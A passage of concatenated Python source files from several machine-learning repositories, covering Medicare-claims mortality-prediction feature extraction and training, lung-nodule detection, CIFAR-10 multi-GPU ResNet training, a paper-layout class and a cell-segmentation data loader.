whole_train_normed=(whole_train[:,:]-x_mean)/x_std matrix=np.ones((length*2+len(x_mean)*4))*(-5000) if (i>=7): matrix[0:length]=whole_train[i-7:i+1,:].flatten() else: matrix[(length-(i+1)*len(whole_train[0].flatten())):length]=whole_train[0:i+1,:].flatten() if (i>=7): matrix[length:length*2]=whole_train_normed[i-7:i+1,:].flatten() else: matrix[(length*2-(i+1)*len(whole_train[0].flatten())):(length*2)]=whole_train_normed[0:i+1,:].flatten() matrix[(length*2):(length*2+len(x_mean))]=x_std matrix[(length*2+len(x_mean)):(length*2+len(x_mean)*2)]=np.sum(whole_train[:,:][whole_train[:,:]==-3000],axis=0)/(-3000.0)/float(whole_train.shape[0]) baseline=[] jjj=0 while (jjj<whole_train.shape[1]): iii=0 val=np.nan while (iii<whole_train.shape[0]): if (whole_train[iii][jjj]==-3000): pass else: if (math.isnan(val)): val=whole_train[iii][jjj] timediff=whole_train.shape[0]-iii iii=iii+1 if (math.isnan(val)): baseline.append(np.nan) baseline.append(np.nan) else: baseline.append(val) baseline.append(timediff) jjj=jjj+1 matrix[(length*2+len(x_mean)*2):(length*2+len(x_mean)*4)]=np.asarray(baseline) i=i+1 return matrix def faster_feature (whole_train): assert len(whole_train.shape) == 2 i=whole_train.shape[0]-1 input_dim = whole_train.shape[1] while(i<whole_train.shape[0]): length=8*input_dim x_mean=np.nanmean(whole_train,axis=0) assert len(x_mean) == input_dim x_std=np.nanstd(whole_train,axis=0)+0.01 x_norm = np.nan_to_num((whole_train[i,:] - x_mean) / x_std) whole_train_normed=(whole_train - x_mean[np.newaxis, :])/x_std[np.newaxis, :] matrix=np.ones((length*2+len(x_mean)*4))*(-5000) if (i>=7): matrix[0:length]=whole_train[i-7:i+1,:].flatten() matrix[length:length*2]=whole_train_normed[i-7:i+1,:].flatten() else: matrix[(length-(i+1)*input_dim):length]=whole_train[0:i+1,:].flatten() matrix[(length*2-(i+1)*len(whole_train[0].flatten())):(length*2)]=whole_train_normed[0:i+1,:].flatten() pass matrix[(length*2):(length*2+len(x_mean))]=x_std matrix[(length*2+len(x_mean)):(length*2+len(x_mean)*2)]=np.sum(whole_train[:,:]==-3000,axis=0)/float(whole_train.shape[0]) matrix[(length*2+len(x_mean)*2):(length*2+len(x_mean)*4)]= grad_feature(whole_train, -3000) i=i+1 return matrix ``` #### File: aaalgo/health_outcome_challenge/report.py ```python from jinja2 import Template TMPL_HTML = """<html> <body> {% for loss, label, predict, cutoff, demo, claims, codes, d_demo, d_claims, d_codes, case in cases %} <hr/> <table border="1"> <tr><th>pid</th><th>loss</th><th>label</th><th>prediction</th><th>cutoff</th></tr> <tr><td>{{case.pid}}</td><td>{{loss}}</td><td>{{label}}</td><td>{{predict}}</td><td>{{cutoff}}</td></tr> </table> <br/> <table border="1"> <tr> {% for c in demo_columns %} <td>{{c}}</td> {% endfor %} </tr> {% for demo in case.demos() %} <tr> {% for c in demo_columns %} <td>{{ demo[c]}}</td> {% endfor %} </tr> {% endfor %} </table> <table border="1"> <tr> {% for c in claim_columns %} <td>{{c}}</td> {% endfor %} </tr> {% for claim in case.claims() %} <tr> {% for c in claim_columns %} <td>{{ claim[c] }}</td> {% endfor %} </tr> {% endfor %} </table> <table border="1"> <tr> {% for c in claim_features %} <td>{{c[:6]}}</td> {% endfor %} </tr> {% for claim in d_claims %} <tr> {% for c in claim %} <td> {% if c > 0.0001 or c < -0.0001 %} {{ '%0.4f' % c }} {% endif %} </td> {% endfor %} </tr> {% endfor %} </table> {% endfor %} </body> </html>""" tmpl = Template(TMPL_HTML) def generate_report (loader, cases, path): with open(path, 'w') as f: f.write(tmpl.render({ 'cases': cases, 'demo_columns': loader.demo_columns(), 'claim_columns': loader.claim_columns(), 'claim_features': loader.feature_columns()[:-100], })) pass if __name__ == '__main__': import cms import pickle loader = cms.CoreLoader(cms.loader) with open('eval.pkl', 'rb') as f: out = pickle.load(f) pass cases = [] for pid, loss, label, predict, cutoff, X, grads, line in out: assert not line is None case = loader.load(line, True) assert pid == case.pid #case.label = int(label) #case.predict = predict demo, claims, codes, mapping = X d_demo, d_claims, d_codes = grads cases.append((loss, label, predict, cutoff, demo[0], claims[0], codes[0], d_demo[0], d_claims[0], d_codes, case)) pass generate_report(loader, cases, 'eval.html') ``` #### File: aaalgo/health_outcome_challenge/stat_helper.py ```python import sys import os import traceback import pickle import mrjob from mrjob.job import MRJob import cms import config import target class MergeJob (MRJob): INPUT_PROTOCOL = mrjob.protocol.TextProtocol FILES = config.HADOOP_FILES JOBCONF = {'mapred.reduce.tasks': 10} def mapper_init (self): self.loader = cms.CaseLoader() pass def mapper (self, key, value): case = self.loader.load(value) # 统计DEN人数 for den in case.den: year = '20%02d' % int(den.RFRNC_YR) yield 'den_%s' % year, 1 yield 'den_%s_sex_%d' % (year, int(den.SEX)), 1 yield 'den_%s_state_%d' % (year, int(den.STATE_CD)), 1 #yield 'den_%s_cnty_%d' % (year, int(den.CNTY_CD)), 1 yield 'den_%s_race_%d' % (year, int(den.RACE)), 1 yield 'den_%s_age_%d' % (year, int(den.AGE)), 1 pass if len(case.den) > 0: den = case.den[-1] yield 'den', 1 yield 'den_sex_%d' % int(den.SEX), 1 yield 'den_state_%d' % int(den.STATE_CD), 1 #yield 'den_cnty_%d' % int(den.CNTY_CD), 1 yield 'den_race_%d' % int(den.RACE), 1 yield 'den_age_%d' % int(den.AGE), 1 for ctype in cms.CLAIM_TYPES: rows = getattr(case, ctype, []) labels = target.label_records(rows, ctype == 'inp', False) for row, labels in zip(rows, labels): #getattr(case, ctype): year = str((int(row.THRU_DT) // 10000)) yield 'claim', 1 yield 'claim_%s' % year, 1 yield 'claim_state_%d' % int(row.STATE_CD), 1 yield 'claim_%s_state_%d' % (year, int(row.STATE_CD)), 1 yield 'pmt', row.PMT_AMT yield 'pmt_%s' % year, row.PMT_AMT yield ctype, 1 yield '%s_%s' % (ctype, year), 1 yield '%s_pmt' % ctype, row.PMT_AMT yield '%s_pmt_%s' % (ctype, year), row.PMT_AMT if labels[0]: yield 'E', 1 yield 'E_%s' % year, 1 yield 'E_%s_%s' % (year, ctype), 1 if labels[1]: yield 'POA', 1 yield 'POA_%s' % year, 1 yield 'POA_%s_%s' % (year, ctype), 1 pass pass def reducer (self, key, values): yield key, sum(values) pass if __name__ == '__main__': MergeJob.run() pass ``` #### File: aaalgo/health_outcome_challenge/train_large_trees.py ```python import os import sys import numpy as np import random import pickle from datetime import datetime from glob import glob from tqdm import tqdm import sklearn.metrics as metrics import lightgbm import cms os.nice(20) def load_train_cases (paths, loader, gs_path, n = -1): gs = list(cms.load_gs(gs_path)) if n > 0 and n < len(gs): gs = gs[:n] pass cases = loader.bulk_load_aggr_features(paths, [[pid, cutoff] for _, pid, _, cutoff in gs]) X = [] Y = [] pids = [] for label, pid, _, cutoff in gs: X.append(cases[(pid, cutoff)]) Y.append(label) pids.append((pid, cutoff)) pass print("%d cases loaded." % len(Y)) return np.vstack(X), np.array(Y), pids if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(prog='PROG') parser.add_argument('--task', default='mortality' , help='') parser.add_argument('--root', default='mortality_small' , help='') #parser.add_argument('--n1', default=5000, type=int) #parser.add_argument('--n2', default=1000, type=int) args = parser.parse_args() assert args.task == 'mortality' train_paths = list(glob('%s/train/part-0*' % args.root)) test_paths = list(glob('%s/test/part-0*' % args.root)) loader = cms.CoreLoader(cms.loader) train_x, train_y, _ = load_train_cases(train_paths, loader, '%s/train_gs' % args.root) test_x, test_y, test_pids = load_train_cases(test_paths, loader, '%s/test_gs' % args.root) #eval_callback = EpochCallback(test_gs, test_files) print(train_x.shape, train_y.shape) print(test_x.shape, test_y.shape) params = { 'boosting_type': 'gbdt', #'objective': 'regression', 'num_leaves': 150, 'learning_rate': 0.05, 'verbose': 0, 'n_estimators': 400, 'reg_alpha': 2.0, } model = lightgbm.LGBMRegressor(**params) model.fit(train_x, train_y) with open('lgbm_model.pkl', 'wb') as f: pickle.dump(model, f) pass pred = model.predict(test_x) auc = metrics.roc_auc_score(test_y, pred) print('auc:', auc) order = [(v,i) for i, v in enumerate(pred)] order.sort() ranks = [None for _ in range(len(order))] for i, (_, j) in enumerate(order): ranks[j] = i pass N = len(order) # rank 0: 按预测分数排序 evals = [] for pid, label, pred, rank in zip(test_pids, test_y, pred, ranks): if label == 0: # rank应该低才好 # 差的排前面,所以rank越大分数应该越小 orank = N - rank elif label == 1: orank = rank pass evals.append((pid, label, pred, rank, orank)) pass evals.sort(key=lambda x: x[-1]) with open('eval.html', 'w') as f: f.write('<html><body><table border="1">\n') f.write('<tr><th>pid</th><th>cutoff</th><th>label</th><th>pred</th><th>rank</th><th>order</th></tr>\n') for (pid, cutoff), label, pred, rank, orank in evals[:2000]: f.write(f'<tr><td>{pid}</td><td>{cutoff}</td><td>{label}</td><td>{pred:.3f}</td><td>{rank}</td><td>{orank}</td></tr>\n') f.write('</table></body></html>\n') pass ``` #### File: health_outcome_challenge/version1/merge_test_good_minus_1_year.py ```python import os import sys import pickle from glob import glob from collections import defaultdict CNTS = { "car_claimsj_lds_5_2012.csv": 286822, "car_linej_lds_5_2012.csv": 577809, "den_saf_lds_5_2012.csv": 14586, "dme_claimsj_lds_5_2012.csv": 24206, "dme_linej_lds_5_2012.csv": 43115, "hha_claimsj_lds_5_2012.csv": 2406, "hha_instcond_lds_5_2012.csv": 328, "hha_instoccr_lds_5_2012.csv": 181, "hha_instval_lds_5_2012.csv": 9210, "hha_revenuej_lds_5_2012.csv": 49080, "hosp_claimsj_lds_5_2012.csv": 1199, "hosp_instcond_lds_5_2012.csv": 379, "hosp_instoccr_lds_5_2012.csv": 1162, "hosp_instval_lds_5_2012.csv": 2220, "hosp_revenuej_lds_5_2012.csv": 19787, "inp_claimsj_lds_5_2012.csv": 5050, "inp_instcond_lds_5_2012.csv": 6613, "inp_instoccr_lds_5_2012.csv": 7734, "inp_instval_lds_5_2012.csv": 18270, "inp_revenuej_lds_5_2012.csv": 86029, "out_claimsj_lds_5_2012.csv": 52086, "out_instcond_lds_5_2012.csv": 25525, "out_instoccr_lds_5_2012.csv": 62827, "out_instval_lds_5_2012.csv": 119141, "out_revenuej_lds_5_2012.csv": 484649, "snf_claimsj_lds_5_2012.csv": 1839, "snf_instcond_lds_5_2012.csv": 763, "snf_instoccr_lds_5_2012.csv": 2913, "snf_instval_lds_5_2012.csv": 3478, "snf_revenuej_lds_5_2012.csv": 14509 } def construct_2011_name (path): bname = os.path.basename(path) # 2011: hha_instcond_lds_5_2011.csv # inp_instval_lds_2012_sample.csv return bname.replace('2012', '2011') with open('meta.pkl', 'rb') as f: formats, lookup = pickle.load(f) pass ''' def verify_header (path, header, cols): fs = header.strip().split(',') assert len(fs) >= len(cols), '%d %d' % (len(fs), len(cols)) assert fs[0] == 'DESY_SORT_KEY' for h, c in zip(fs, cols): assert h == c.long_name if len(fs) > len(cols): for h in fs[len(cols):]: print("COLUMN NOT MAPPED: ", h, path) pass ''' SPECIAL_DATES = ['CLM_HOSPC_START_DT_ID', 'NCH_BENE_MDCR_BNFTS_EXHTD_DT_I'] def process_file (path): #global lookup #global formats bname = os.path.basename(path) bname2011 = construct_2011_name(path) fid = lookup[bname2011] #print(path, lookup[bname2011]) ind, cols = formats[fid] with open(path, 'r') as f: to_patch = [] for i, col in enumerate(cols): if not col.type is int: continue v = col.long_name.find('_DT') if v < 0: continue suff = col.long_name[(v + 3):] if len(suff) == 0 or suff.isnumeric() or col.long_name in SPECIAL_DATES: to_patch.append((i, col)) pass for row, line in enumerate(f): line = line.strip() fs = line.split(',') assert len(fs) == len(cols) key = fs[0] assert len(key) == 9 for i, col in to_patch: if len(fs[i]) == 0: continue assert fs[i].isnumeric(), 'xxx:%s' % fs[i] x = int(fs[i]) if col.long_name == 'DOB_DT' and x < 100: continue assert x > 18000000 x = x - 10000 if x == 20110229: x = 20110228 fs[i] = str(x) #fs[i] = str(x - 0) pass fs.insert(0, str(fid)) yield key, ','.join(fs) pass pass merged = defaultdict(lambda: []) KEYS_2012 = defaultdict(lambda: []) for path in ['tests/den_saf_lds_5_2012.csv']: for key, value in process_file(path): key1 = key[:6] KEYS_2012[key1].append(key) pass pass print(len(KEYS_2012), 'keys in 2012 loaded.') C = 0 #for path in glob('tests/*2012*.csv'): for path in glob('tests/*.csv'): c = 0 check_cnts = CNTS[os.path.basename(path)] del CNTS[os.path.basename(path)] for key, value in process_file(path): merged[key].append(value) c += 1 pass print(c, 'rows loaded from ', path) assert (c == check_cnts) C += 1 pass assert len(CNTS) == 0 with open('/shared/data/CMS/tests/tests_2012_minus_1year', 'w') as f: for k, v in merged.items(): f.write(k) f.write('\t') f.write('|'.join(v)) f.write('\n') pass pass ```
{ "source": "aaalgo/lung_example", "score": 2 }
#### File: aaalgo/lung_example/train.py ```python import math import sys sys.path.append('../aardvark') sys.path.append('build/lib.linux-x86_64-' + sys.version[:3]) import random import numpy as np import tensorflow as tf import aardvark import rpn3d from zoo import net3d from lung import * import cpp flags = tf.app.flags FLAGS = flags.FLAGS MIN_SPACING = 0.75 MAX_SPACING = 0.85 SZ = 128 class Stream: # this class generates training examples def __init__ (self, path, is_training): self.ones = np.ones((1, SZ, SZ, SZ, 1), dtype=np.float32) samples = [] with open(path, 'r') as f: for l in f: samples.append(l.strip()) pass pass self.samples = samples self.sz = len(samples) self.is_training = is_training self.reset() pass def reset (self): samples = self.samples is_training = self.is_training def generator (): while True: if is_training: random.shuffle(samples) pass for path in samples: volume = H5Volume(path) n = volume.annotation.shape[0] # sample one random annotation # TODO: what if there are multiple nearby annotations? if n == 0: # no nodule continue n = random.randint(0, n-1) spacing = random.uniform(MIN_SPACING, MAX_SPACING) sub, nodule = extract_nodule(volume, volume.annotation[n], spacing, (SZ, SZ, SZ)) # TODO augmentation? a, p = cpp.encode(sub.images.shape, nodule) images = sub.images[np.newaxis, :, :, :, np.newaxis] pw = a[np.newaxis, :, :, :, np.newaxis] a = a[np.newaxis, :, :, :, np.newaxis] p = p[np.newaxis, :, :, :, np.newaxis, :] # we should also generate pure negative samples yield None, images, a, self.ones, p, pw if not self.is_training: break self.generator = generator() pass def size (self): return self.sz def next (self): return next(self.generator) class Model (aardvark.Model, rpn3d.BasicRPN3D): def __init__ (self): aardvark.Model.__init__(self) rpn3d.BasicRPN3D.__init__(self) pass def rpn_backbone (self, volume, is_training, stride): assert(stride == 1) net, s = net3d.unet(volume, is_training) return net def rpn_logits (self, net, is_training, channels): return tf.layers.conv3d_transpose(net, channels, 3, strides=1, activation=None, padding='SAME') def rpn_params (self, net, is_training, channels): return tf.layers.conv3d_transpose(net, channels, 3, strides=1, activation=None, padding='SAME') def build_graph (self): self.is_training = tf.placeholder(tf.bool, name="is_training") self.images = tf.placeholder(tf.float32, shape=(None, SZ, SZ, SZ, FLAGS.channels), name="volume") self.build_rpn(self.images, self.is_training, (SZ, SZ, SZ)) pass def create_stream (self, path, is_training): return Stream(path, is_training) def feed_dict (self, record, is_training = True): _, images, a, aw, p, pw = record return {self.images: images, self.gt_anchors: a, self.gt_anchors_weight: aw, self.gt_params: p, self.gt_params_weight: pw, self.is_training: is_training} pass def main (_): FLAGS.channels = 1 FLAGS.classes = 1 FLAGS.db = 'luna16.list' FLAGS.val_db = None FLAGS.epoch_steps = 100 FLAGS.ckpt_epochs = 1 FLAGS.val_epochs = 1000 FLAGS.model = "model" FLAGS.rpn_stride = 1 FLAGS.rpn_params = 4 model = Model() aardvark.train(model) pass if __name__ == '__main__': try: tf.app.run() except KeyboardInterrupt: pass ```
{ "source": "aaalgo/nnexp", "score": 2 }
#### File: aaalgo/nnexp/train-picpac.py ```python import os import sys import logging import numpy as np import cv2 import time import picpac import theano from theano import tensor as T import lasagne from tqdm import tqdm def save_params(model, fn): if isinstance(model, list): param_vals = model else: param_vals = lasagne.layers.get_all_param_values(model) if 'npz' in fn: np.savez(fn, *param_vals) else: with open(fn, 'w') as wr: import pickle pickle.dump(param_vals, wr) def run_epoch (stream, func, maxit, shape): err = None n = 0 #print maxit for it in tqdm(range(maxit)): #stream.get_epoch_iterator(), total=maxit): image, anno, pad = stream.next() e = np.array(func(image, anno)) if err is None: err = e else: err += e n += 1 pass return err / n def train (model, data, out_path, max_epoch, K, fold, batch): verbose = True seed = 1996 tr_stream = picpac.ImageStream(data, batch=batch, K=K, fold=fold, train=True, annotate='image', seed=seed, reshuffle=True) shape = tr_stream.next()[0].shape logging.info('data shape is {}'.format(shape)) import pkgutil loader = pkgutil.get_importer('models') # load network from file in 'models' dir model = loader.find_module(model).load_module(model) input_var = T.tensor4('input') label_var = T.tensor4('label') net, loss, scores = model.network(input_var, label_var, shape) params = lasagne.layers.get_all_params(net, trainable=True) lr = theano.shared(lasagne.utils.floatX(3e-3)) updates = lasagne.updates.adam(loss, params, learning_rate=lr) train_fn = theano.function([input_var, label_var], loss, updates=updates) test_fn = theano.function([input_var, label_var], scores) best = None # (score, epoch, params) for epoch in range(max_epoch): start = time.time() tr_err = run_epoch(tr_stream, train_fn, tr_stream.size() / batch, shape) te_stream = picpac.ImageStream(data, batch=batch, K=K, fold=fold, train=False, annotate='image', seed=seed) te_err = run_epoch(te_stream, test_fn, te_stream.size() / batch, shape) s = te_err[0] if best is None or s < best[0]: best = (s, epoch, [np.copy(p) for p in (lasagne.layers.get_all_param_values(net))]) pass if verbose: print('ep {}/{} - tl {} - vl {} - t {:.3f}s'.format( epoch, max_epoch, tr_err, te_err, time.time()-start)) pass print "save best epoch: {:d}".format(best[1]) save_params(best[2], out_path) pass if __name__ == '__main__': import argparse logging.basicConfig(level=logging.DEBUG) parser = argparse.ArgumentParser(description='import training images & labels') #parser.add_argument('--root', default='hdfs://washtenaw:19000/user/hive/warehouse/wdong_tri.db') parser.add_argument('model', nargs=1) parser.add_argument('data', nargs=1) parser.add_argument('params', nargs=1) parser.add_argument('--epoch', default=300, type=int) parser.add_argument('--fold', default=0, type=int) parser.add_argument('-K', default=5, type=int) parser.add_argument('--batch', default=16, type=int) args = parser.parse_args() np.random.seed(1234) train(args.model[0], args.data[0], args.params[0], args.epoch, args.K, args.fold, args.batch) pass ```
{ "source": "aaalgo/paperworks", "score": 3 }
#### File: paperworks/layout/__init__.py ```python from reportlab.lib.pagesizes import letter, A4, landscape from reportlab.lib.units import inch #from params import * class LetterSizeLandscapeLayout: # all orders are x, y, or width, height # all boxes are x, y, width, height def __init__ (self): width, height = landscape(letter) margin = 0.25 * inch # margin space = 0.5 * inch hspace = 0.25 * inch qspace = 0.125 * inch self.space = space self.hspace = hspace self.qspace = qspace self.image_margin = qspace self.paper_size = width, height self.margin = margin self.box_height = 0.4 * inch # sample box or barcode self.box_width = 1.5 * inch # barcode single bar width self.bar_width = 0.02 * inch self.anchor_size = 0.4 * inch # x0, y0, x1, y1: content box x0 = margin y0 = margin x1 = width - margin y1 = height - margin self.contentbb = x0, y0, x1 - x0, y1 - y0 self.imagebb = x0, y0 + self.box_height + qspace, x1 - x0, y1 - y0 - (self.box_height + qspace) * 2 self.anchors = [] self.samples = [] # generate anchors r = self.anchor_size / 2 for X, Y, dx, dy, dir,n in [(x0+r, y0+r, 1, 1, 0, 4), (x1-r, y0+r, -1, 1, 0, 4), (x0+r, y1-r, 1, -1, 0, 4), (x1-r, y1-r, -1, -1, 0, 5)]: anchors = [] for s in range(n): x = X + dx * s * (1-dir) * (self.anchor_size + qspace) y = Y + dy * s * dir * (self.anchor_size + qspace) anchors.append([x, y]) pass # sort by x anchors.sort(key=lambda a:a[0]) self.anchors.extend(anchors) pass sample_x = x0 + 4 * (self.anchor_size + qspace) + hspace self.barcode_x = sample_x + 2 * (self.box_width + hspace) + hspace self.barcode_y = y0 for y, n in [(y0, 2), (y1-self.box_height, 3)]: x = sample_x for _ in range(n): self.samples.append([x, y, self.box_width, self.box_height]) x += self.box_width + hspace pass pass pass pass ```
{ "source": "aaalgo/picpac-demos", "score": 2 }
#### File: aaalgo/picpac-demos/cls-train-cifar10-multi.py ```python import os import sys sys.path.append('install/picpac/build/lib.linux-x86_64-%d.%d' % sys.version_info[:2]) os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' import time import threading from tqdm import tqdm import numpy as np import cv2 import tensorflow as tf from tensorflow.contrib import layers import tensorflow.contrib.slim as slim from tensorflow.contrib.slim.nets import resnet_v1 #import resnet_v1 import picpac #import cls_nets as nets print(picpac.__file__) def resnet_v1_18_impl (inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, reuse=tf.AUTO_REUSE, scope='resnet_v1_18'): resnet_v1_block = resnet_v1.resnet_v1_block blocks = [ resnet_v1_block('block1', base_depth=64, num_units=2, stride=2), resnet_v1_block('block2', base_depth=128, num_units=2, stride=2), resnet_v1_block('block3', base_depth=256, num_units=2, stride=2), resnet_v1_block('block4', base_depth=512, num_units=2, stride=1), ] return resnet_v1.resnet_v1( inputs, blocks, num_classes, is_training, global_pool, output_stride, include_root_block=False, reuse=reuse, scope=scope) def resnet_18 (inputs, is_training, num_classes): logits, _ = resnet_v1_18_impl(inputs, num_classes=num_classes, is_training=is_training) logits = tf.squeeze(logits, [1,2]) # resnet output is (N,1,1,C, remove the return tf.identity(logits, name='logits') flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('db', 'cifar10-train.picpac', 'training db') flags.DEFINE_string('val_db', 'cifar10-test.picpac', 'validation db') flags.DEFINE_integer('classes', 10, 'number of classes') flags.DEFINE_string('mixin', None, 'mix-in training db') flags.DEFINE_integer('channels', 3, '') flags.DEFINE_integer('size', 32, '') flags.DEFINE_integer('batch', 128, 'Batch size. ') flags.DEFINE_string('net', 'resnet_18', 'architecture') flags.DEFINE_string('model', 'cls_model', 'model directory') flags.DEFINE_string('resume', None, 'resume training from this model') flags.DEFINE_integer('max_to_keep', 100, '') # optimizer settings flags.DEFINE_float('learning_rate', 0.02, 'Initial learning rate.') flags.DEFINE_float('decay_rate', 0.95, '') flags.DEFINE_float('decay_steps', 500, '') # flags.DEFINE_integer('max_steps', 200000, '') flags.DEFINE_integer('ckpt_epochs', 10, '') flags.DEFINE_integer('val_epochs', 2, '') flags.DEFINE_integer('num_gpus', 2, '') def cls_loss (logits, labels): cnt = tf.identity(tf.to_float(tf.shape(logits)[0]), name='ct') #labels = tf.to_int32(labels) logits = tf.reshape(logits, (-1, FLAGS.classes)) labels = tf.reshape(labels, (-1,)) xe = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels) xe = tf.reduce_sum(xe, name='xe') with tf.device('/cpu:0'): acc = tf.cast(tf.nn.in_top_k(logits, labels, 1), tf.float32) acc = tf.reduce_sum(acc, name='acc') reg = tf.reduce_sum(tf.losses.get_regularization_losses()) reg = tf.identity(reg, name='re') # optimize for cross-entropy # display cross entropy and accuracy #reg = tf.identity(0, name='reg') loss = tf.identity(xe + reg, name='lo') return loss/cnt, [cnt, xe, acc, reg, loss] def average_gradients(tower_grads): #[ [grad, v] ] average_grads = [] for grad_and_vars in zip(*tower_grads): grads = [] for g, nn in grad_and_vars: #print(nn, g.dtype) expanded_g = tf.expand_dims(g, 0) grads.append(expanded_g) grad = tf.concat(grads, 0) grad = tf.reduce_mean(grad, 0) v = grad_and_vars[0][1] grad_and_var = (grad, v) average_grads.append(grad_and_var) return average_grads def main (_): try: os.makedirs(FLAGS.model) except: pass with tf.device('/cpu:0'): X = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.channels), name="images") # ground truth labels Y = tf.placeholder(tf.int32, shape=(None, ), name="labels") queue = tf.FIFOQueue(32, (tf.float32, tf.int32)) enc = queue.enqueue((X, Y)) is_training = tf.placeholder(tf.bool, name="is_training") global_step = tf.train.create_global_step() #rate = FLAGS.learning_rate #rate = tf.train.exponential_decay(rate, global_step, FLAGS.decay_steps, FLAGS.decay_rate, staircase=True) #optimizer = tf.train.MomentumOptimizer(learning_rate=rate, momentum=0.9) optimizer = tf.train.AdamOptimizer(0.0001) with slim.arg_scope([slim.conv2d], weights_regularizer=slim.l2_regularizer(2.5e-4)), \ slim.arg_scope([layers.batch_norm], decay=0.9, epsilon=5e-4): # CPU variables #_ = nets.resnet_18(X, is_training, FLAGS.classes) all_grads = [] all_metrics = [] refs = [] for i in range(FLAGS.num_gpus): with tf.device('/gpu:%d' % i): with tf.name_scope('w%d' % i) as scope: decX, decY = queue.dequeue() decX.set_shape(X.get_shape()) decY.set_shape(Y.get_shape()) with tf.variable_scope('netnet'): logits = resnet_18(decX, is_training, FLAGS.classes) #tf.get_variable_scope().reuse_variables() loss, metrics = cls_loss(logits, decY) grads = optimizer.compute_gradients(loss) all_grads.append(grads) all_metrics.append(metrics) refs.append((decX, decY)) pass pass pass grads = average_gradients(all_grads) train_op = optimizer.apply_gradients(grads, global_step=global_step) pass metric_names = [x.name.split('/')[1][:-2] for x in all_metrics[0]] def format_metrics (avg): return ' '.join(['%s=%.3f' % (a, b) for a, b in zip(metric_names, list(avg))]) #global_step = tf.Variable(0, name='global_step', trainable=False) #train_op = optimizer.minimize(loss, global_step=global_step) #train_op = slim.learning.create_train_op(loss, optimizer, global_step=global_step) #init = tf.initialize_all_variables() #saver = tf.train.Saver(max_to_keep=FLAGS.max_to_keep) picpac_config = {"db": FLAGS.db, "loop": True, "shuffle": True, "reshuffle": True, "annotate": False, "channels": FLAGS.channels, "stratify": True, "dtype": "float32", "batch": FLAGS.batch//2, "threads": 6, "transforms": [ {"type": "augment.flip", "horizontal": True, "vertical": False}, {"type": "normalize", "mean": 127, "std": 127}, #{"type": "augment.rotate", "min":-10, "max":10}, #{"type": "augment.scale", "min":0.7, "max":1.2}, {"type": "clip", "size": FLAGS.size, "shift": 4}, #{"type": "colorspace", "code": "BGR2HSV", "mul0": 1.0/255}, #{"type": "augment.add", "range":20}, #{"type": "colorspace", "code": "HSV2BGR", "mul1": 255.0}, ] } if not FLAGS.mixin is None: print("mixin support is incomplete in new picpac.") # assert os.path.exists(FLAGS.mixin) # picpac_config['mixin'] = FLAGS.mixin # picpac_config['mixin_group_delta'] = 1 # pass # do we want to apply below to validation images? # load training db assert FLAGS.db and os.path.exists(FLAGS.db) stream = picpac.ImageStream(picpac_config) # load validation db val_stream = None if FLAGS.val_db: val_config = {"db": FLAGS.val_db, "loop": False, "channels": FLAGS.channels, "dtype": "float32", "batch": FLAGS.batch, "transforms": [ {"type": "normalize", "mean": 127, "std": 127}, {"type": "clip", "size": FLAGS.size, 'border_type': 'replicate'}, ] } assert os.path.exists(FLAGS.val_db) val_stream = picpac.ImageStream(val_config) config = tf.ConfigProto() config.gpu_options.allow_growth=True with tf.Session(config=config) as sess, open('cls-train-cifar10.log', 'w') as log: coord = tf.train.Coordinator() sess.run(tf.global_variables_initializer()) sess.run(tf.local_variables_initializer()) def enqueue_sample (): while not coord.should_stop(): meta, images = stream.next() sess.run(enc, feed_dict={X: images, Y: meta.labels.astype(np.int32)}) pass # create encoding threads thread = threading.Thread(target=enqueue_sample, args=()) thread.start() #if FLAGS.resume: # saver.restore(sess, FLAGS.resume) epoch_steps = (stream.size() + FLAGS.batch-1) // FLAGS.batch best = 0 step = 0 epoch = 0 global_start_time = time.time() while step < FLAGS.max_steps: start_time = time.time() avg = np.array([0] * len(metrics), dtype=np.float32) progress = tqdm(range(epoch_steps), leave=False) for _ in progress: mms, _, = sess.run([all_metrics, train_op], feed_dict={is_training:True}) for mm in mms: avg += np.array(mm) progress.set_description(format_metrics(avg/avg[0])) step += 1 pass avg /= avg[0] stop_time = time.time() print('epoch=%d step=%d elapsed=%.4f time=%.4f %s' % (epoch, step, (stop_time - global_start_time), (stop_time - start_time), format_metrics(avg))) epoch += 1 # validation X1, Y1 = refs[0] if epoch and (epoch % FLAGS.val_epochs == 0) and not val_stream is None: lr =0 #lr = sess.run(rate) # evaluation val_stream.reset() avg = np.array([0] * len(metrics), dtype=np.float32) for meta, image in val_stream: feed_dict = {X1: image, Y1: meta.labels, is_training: False} mm = sess.run(all_metrics[0], feed_dict=feed_dict) avg += np.array(mm) pass avg /= avg[0] if avg[2] > best: best = avg[2] print('validation %s' % format_metrics(avg), "best", best, 'lr', lr) log.write('%d\t%s\t%.4f\n' % (epoch, '\t'.join(['%.4f' % x for x in avg]), best)) ''' # model saving if epoch and (epoch % FLAGS.ckpt_epochs == 0): ckpt_path = '%s/%d' % (FLAGS.model, epoch) saver.save(sess, ckpt_path) print('step %d, saving to %s.' % (step, ckpt_path)) pass ''' pass pass if __name__ == '__main__': tf.app.run() ``` #### File: aaalgo/picpac-demos/dsb2018-train.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import shutil import math from glob import glob import cv2 import random import copy import numpy as np import imageio from skimage import measure import logging import subprocess as sp ROOT = os.path.abspath(os.path.dirname(__file__)) DATA_DIR = os.path.join(ROOT, 'data') class Sample: def __init__ (self, folder): path = None for p in glob(os.path.join(folder, "images/*")): assert ".png" in p assert path is None path = p pass image = cv2.imread(path, -1) #cv2.IMREAD_COLOR) if len(image.shape) == 2: # Sanity check # In case of gray image data in private phase # case this to fail remove the assertion assert False image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR) else: assert len(image.shape) == 3 if image.shape[2] == 4: assert (image[:, :, 3] == 255).all() image = image[:, :, :3] pass assert image.shape[2] == 3 self.image = image mask_shape = image.shape[:2] masks = [] for path in glob(os.path.join(folder, "masks/*")): assert ".png" in path mask = cv2.imread(path, cv2.IMREAD_GRAYSCALE) assert mask.shape == mask_shape mask = np.clip(mask, 0, 1) masks.append(mask) self.masks = masks pass def mask_sum (self, dilate = None): v = np.zeros(self.image.shape[:2], dtype=np.float) for mask in self.masks: if dilate is None: v += mask elif dilate > 0: v += cv2.dilate(mask, (dilate, dilate)) elif dilate < 0: # !!! check v += cv2.erode(mask, 